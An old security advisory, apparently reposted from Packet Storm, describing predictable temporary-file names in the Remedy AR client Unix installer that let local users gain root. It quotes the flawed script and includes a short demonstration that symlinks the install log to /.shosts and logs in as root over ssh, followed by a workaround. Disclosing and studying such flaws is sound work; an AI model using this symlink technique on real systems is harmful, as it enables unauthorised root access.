Lucene search
K

remedy.txt

🗓️ 16 Aug 2001 00:00:00Reported by Echo8Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Remedy client installer has vulnerabilities allowing local users to gain root privileges via temporary files.

Code
` Security Holes in Remedy Client Installer  
  
Summary  
-------  
  
Due to improper handling of temporary files, the installer program for  
Remedy Software's Action Request System client for unix can allow local  
users to gain root privileges.  
  
Details  
-------  
  
The installer script for the unix AR clients (ar_install) uses files with  
predicatable names in world-writeable locations to store temporary files  
and logging information. The code does not check to see if the files exist  
before writing to them, or if the files are symbolic links to something  
else. A local user can exploit this (by symbolically linking the target  
files to something else ahead of time) to create or overwrite files  
anywhere on the system. If the AR client is installed as root, this type  
of attack can be used by unprivileged users to gain root access under the  
right circumstances (eg. a local user knows that the AR client will be  
installed on a system in the near future).  
  
There are several instances of this problem in ar_install. A few examples:  
  
# Name of the file to record a log of the installation into  
#  
LOGFILE="/usr/tmp/arClient_install.log"  
  
...   
  
############################################  
# lecho - Logged echo to stdout  
# Arg 0 to N = Data to be echoed  
############################################  
lecho()  
{  
echo "$@" >> $LOGFILE  
echo "$@"  
}  
  
The lecho function is then frequently used to write logging data to  
$LOGFILE.  
  
Another example:   
  
#  
# Test if "ex -" has any problem on this machine. If there is, use "ex"  
#  
echo "$PROD" > /tmp/ex.test  
ex - /tmp/ex.test << EOF  
/$PROD/  
s/$PROD/$PROD_LONG/  
w!  
q  
EOF  
RET=$?  
RES=`cat /tmp/ex.test`  
if [ \( $RET -eq 0 \) -a \( "$RES" = "$PROD_LONG" \) ]  
then  
EX="ex -"  
else  
EX="ex"  
fi  
  
Demonstration  
-------------  
  
$ hostname  
brokenhost  
$ id  
uid=5000(foo) gid=20(users)  
$ ln -s /.shosts /var/tmp/arClient_install.log  
$ ls -alt /var/tmp/arClient_install.log  
lrwxrwxrwx 1 foo users 8 Apr 12 14:57   
/var/tmp/arClient_install.log -> /.shosts  
  
...wait for root to run ar_install...  
  
$ ls -alt /.shosts  
-rw-rw-rw- 1 root other 50873 Apr 12 14:58 /.shosts  
$ cat > /.shosts  
brokenhost foo  
^D  
$ ssh -l root brokenhost  
Last login: Thu Apr 12 14:50:30 from someotherhost  
Sun Microsystems Inc. SunOS 5.6 Generic August 1997  
brokenhost # id  
uid=0(root) gid=1(other)  
brokenhost #   
  
Vulnerable Versions  
-------------------  
  
I have tested this on Solaris 2.6 and 8, using the installer for AR 4.5.1.  
  
The installers for the other supported unix versions (Irix, AIX, HP/UX and  
NCR System 3000) contain similar issues, so it's likely that they are  
vulnerable as well. The older versions of AR that are available for some  
platforms (3.2.1) use a different install script. That script uses  
different filenames, but appears to have similar flaws.  
  
Workaround  
----------  
  
If the AR client is being installed on a single-user workstation, it can  
be installed as a non-root user (this is not the default, but the  
documentation explains how to do it).   
  
If the AR client must be installed as root, ar_install can be trivially  
modified to avoid using a world-readable/writeable space to store its  
temporary files.   
  
Vendor Notification  
-------------------  
  
The vendor was notified on 4/13/2001.   
  
  
Copyright 4/12/2001, by echo8  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation